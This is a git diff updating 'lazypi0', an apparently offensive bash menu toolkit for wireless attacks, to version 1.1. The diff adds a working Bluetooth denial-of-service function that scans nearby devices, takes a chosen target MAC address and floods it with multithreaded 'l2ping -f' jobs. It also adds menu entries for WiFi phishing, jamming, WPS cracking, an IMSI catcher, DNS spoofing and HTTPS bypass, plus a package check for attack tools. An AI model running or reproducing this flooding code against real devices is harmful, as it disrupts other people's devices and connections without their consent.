Update lazypi0 v1.1

diff --git a/lazypi0 b/lazypi0
--- a/lazypi0
+++ b/lazypi0
@@ -1,5 +1,12 @@
 #!/bin/bash
 
+
+clear
+
+function tools_check(){
+clear
+echo "Checking Missing Tools....!"
+
 packages=("golang" "php" "reaver" "wifite" "xrdp" "tightvncpasswd" "aircrack-ng" "mdk3" "wifipumpkin3" "rtlsdr-scanner" "gqrx-sdr" "bettercap" "wireshark" "ettercap-common" "ettercap-graphical" "ettercap-text-only" "airgeddon" "bully" "nmap" "apache2" "fluxion" "mdk4" "mitmproxy" "fern-wifi-cracker")
 missing_packages=()
 
@@ -23,6 +30,94 @@ else
 fi
 
 clear
+
+}
+
+
+function bluetooth_devices(){
+
+    hcitool scan
+    sleep 10
+
+}
+
+function bluetooth_doos() {
+    execute_l2ping() {
+        l2ping -i hci0 -s $packages_size -f $target_addr
+    }
+
+    clear
+    echo "Searching....!"
+    output=$(hcitool scan 2>&1)
+    lines=($output)
+    id=0
+    unset 'lines[0]'
+    array=()
+    echo "[ID]  [MAC Address]  [Device]"
+    for line in "${lines[@]}"; do
+        info=($line)
+        mac="${info[0]}"
+        array+=("$mac")
+        echo "[$id] $mac ${info[@]:1}"
+        ((id++))
+    done
+
+    echo -e ""
+    read -p 'Target ID~# ' target_id
+    if ! [[ "$target_id" =~ ^[0-9]+$ ]] || [ "$target_id" -ge "${#array[@]}" ]; then
+        echo '[!] ERROR: Invalid Target ID'
+        exit 1
+    fi
+    target_addr="${array[$target_id]}"
+
+    read -p 'Packages size~# ' packages_size
+    if ! [[ "$packages_size" =~ ^[0-9]+$ ]]; then
+        echo '[!] ERROR: Packages size must be an integer'
+        exit 1
+    fi
+
+    read -p 'Threads~# ' threads_count
+    if ! [[ "$threads_count" =~ ^[0-9]+$ ]]; then
+        echo '[!] ERROR: Threads count must be an integer'
+        exit 1
+    fi
+
+    # Execute l2ping command using a thread pool
+    for ((i = 0; i < threads_count; i++)); do
+        execute_l2ping &
+    done
+
+    # Wait for all background jobs to finish
+    wait
+}
+
+
+
+
+function hotsport_only() {
+  clear
+  echo -e "***Hotspot Setup***\n"
+  read -p "Set hotspot name: " ssid_name
+  read -p "Set hotspot password: " password
+  echo -e "\n"
+  # Show list of available WiFi interfaces with numbers
+  echo -e "\e[32m[\e[31m+\e[32m] \e[32mSet WiFi interface name \e[32m[\e[31m+\e[32m]\e[32m[\e[31m+\e[37m]"
+  interfaces=($(ls /sys/class/net | grep -E '^(wlan|en|wlx)'))
+  for i in "${!interfaces[@]}"; do
+    echo -e "$(($i+1))) ${interfaces[$i]}"
+  done
+
+  # Ask user to select interface by number
+  read -p "Enter number of interface to use: " interface_number
+  interface_name=${interfaces[$(($interface_number-1))]}
+  nmcli con add type wifi ifname $interface_name con-name $ssid_name autoconnect yes ssid $ssid_name
+  nmcli con modify $ssid_name 802-11-wireless.mode ap 802-11-wireless.band bg ipv4.method shared
+  nmcli con modify $ssid_name wifi-sec.key-mgmt wpa-psk
+  nmcli con modify $ssid_name wifi-sec.psk "$password"
+  nmcli con up $ssid_name ifname $interface_name
+  echo -e "\n\033[0;32mHotspot Create Successfullt***\n\033[0m"
+  sleep 2
+}
 
 function hotsport_ssh() {
   echo -e "***Hotspot Setup***\n"
@@ -48,6 +143,7 @@ function hotsport_ssh() {
   nmcli con modify $ssid_name wifi-sec.psk "$password"
   nmcli con up $ssid_name ifname $interface_name
   echo -e "\n\033[0;32mHotspot Create Successfullt***\n\033[0m"
+  sleep 2
 }
 
 function wifi_network() {
@@ -626,49 +722,62 @@ while true
 do
     # Display the menu options
     clear
-    echo -e "\n\e[0;32m    ██╗      █████╗ ███████╗██╗   ██╗\e[0;38;5;128m██████╗ ██╗ \e[0;37mv1.0"
+    echo -e "\n\e[0;32m    ██╗      █████╗ ███████╗██╗   ██╗\e[0;38;5;128m██████╗ ██╗ \e[0;37mv1.1"
     echo -e "\e[0;32m    ██║     ██╔══██╗╚══███╔╝╚██╗ ██╔╝\e[0;38;5;128m██╔══██╗██║"
-    echo -e "\e[0;32m    ██║     ███████║  ███╔╝  ╚████╔╝ \e[0;38;5;128m██████╔╝██║  \e[0;37mBy \e[0;31m#Md Nahid Alam"
+    echo -e "\e[0;32m    ██║     ███████║  ███╔╝  ╚████╔╝ \e[0;38;5;128m██████╔╝██║  \e[0;37mBy \e[0;31m#Nahid0x1"
     echo -e "\e[0;32m    ██║     ██╔══██║ ███╔╝    ╚██╔╝  \e[0;38;5;128m██╔═══╝ ██║"
     echo -e "\e[0;32m    ███████╗██║  ██║███████╗   ██║   \e[0;38;5;128m██║     ██║"
     echo -e "\e[0;31mThe\e[0;32m ╚══════╝╚═╝  ╚═╝╚══════╝   ╚═╝   \e[0;38;5;128m╚═╝     ╚═╝ \e[0;31m#a_automation script"
     echo -e "\n\033[0;36m*********************************************************************"
     echo -e "\e[33mSelect an option:\n\e[32m"
     echo -e ""
+    echo -e "\e[33m*Requirement*"
     echo -e "\e[33m0\e[32m) Create Hotspot & Enable SSH    \e[33m00\e[32m) Connect WiFi Network"
+    echo -e "\e[33mc\e[32m) Create Hotspot Only            \e[33mcheck\e[32m) Check Tools"
     echo -e ""
+    echo -e "\e[33m*Hardware*"
     echo -e "\e[33m1\e[37m) Change Mac-Address            \e[31m| \e[33m3\e[37m) Change Private IP Address"
     echo -e "\e[33m2\e[37m) Restore Original Mac-Address  \e[31m| \e[33m4\e[37m) Restore IP Address"
     echo -e ""
+    echo -e "\e[33m*WIFI Hacking*"
     echo -e "\e[33m5\e[37m) Start monitor mode            \e[31m| \e[33m13\e[37m) Airgeddon"
     echo -e "\e[33m6\e[37m) Stop monitor mode             \e[31m| \e[33m14\e[37m) Fluxion"
-    echo -e "\e[33m7\e[37m) Wifite                        \e[31m| \e[33m15\e[37m) WiFi-Pumpkin"
+    echo -e "\e[33m7\e[37m) Wifite                        \e[31m| \e[33m15\e[37m) WiFi-Pumpkin3"
     echo -e "\e[33m8\e[37m) WIFI-Phishing"
     echo -e "\e[33m9\e[37m) Dump & Monitoring WiFis"
-    echo -e "\e[33m10\e[37m) Try To Hack WiFi"
+    echo -e "\e[33m10\e[37m) WPS Crack"
     echo -e "\e[33m11\e[37m) Bruteforce-Handshake"
     echo -e "\e[33m12\e[37m) Wifi Jamming"
     echo -e ""
+    echo -e "\e[33m*Server*"
     echo -e "\e[33m16\e[37m) Enable SSH Server             \e[31m| \e[33m21\e[37m) Listen Port"
     echo -e "\e[33m17\e[37m) Enable RDP"
     echo -e "\e[33m18\e[37m) Transfer file using ssh"
     echo -e "\e[33m19\e[37m) Start localhost using php"
     echo -e "\e[33m20\e[37m) Start Apache2 Server"
     echo -e ""
+    echo -e "\e[33m*SDR*"
     echo -e "\e[33m22\e[37m) IMSI Catcher (RTL-SDR)"
     echo -e "\e[33m23\e[37m) Start RTL-SDR Server"
     echo -e ""
-    echo -e "\e[33m24\e[37m) DNS Spoofing - MITM           \e[31m| \e[33m29\e[37m) Host Discover - MITM"
-    echo -e "\e[33m25\e[37m) ARP Network Sniff - MITM"
+    echo -e "\e[33m*MITM Attack*"
+    echo -e "\e[33m24\e[37m) DNS Spoofing           \e[31m| \e[33m29\e[37m) Host Discover - MITM"
+    echo -e "\e[33m25\e[37m) Monitoring Request"
     echo -e "\e[33m26\e[37m) Start HTTPS Server"
-    echo -e "\e[33m27\e[37m) Bettercap GUI - MITM"
-    echo -e "\e[33m28\e[37m) Bypass HTTPS - MITM"
+    echo -e "\e[33m27\e[37m) Bettercap GUI"
+    echo -e "\e[33m28\e[37m) Bypass HTTPS"
+    echo -e ""
+    echo -e "\e[33m*Bluetooth Attack*"
+    echo -e "\e[33m30\e[37m) Discover Devices"
+    echo -e "\e[33m31\e[37m) Bluetooth Jamming"
     # Read the user's input
     echo -e "\e[37m"
     read -p "$USER@$HOSTNAME~# " option
     case $option in
       0) hotsport_ssh;;
       00) wifi_network;;
+      c) hotsport_only;;
+      check) tools_check;;
       1) change_mac_address;;
       2) restore_mac_address;;
       3) ip_change;;
@@ -698,6 +807,8 @@ do
       27) bettercap_gui;;
       28) bypass_https;;
       29) host_discover;;
+      30) bluetooth_devices;;
+      31) bluetooth_doos;;
       *) echo -e "Invalid option!!";;
     esac
 done
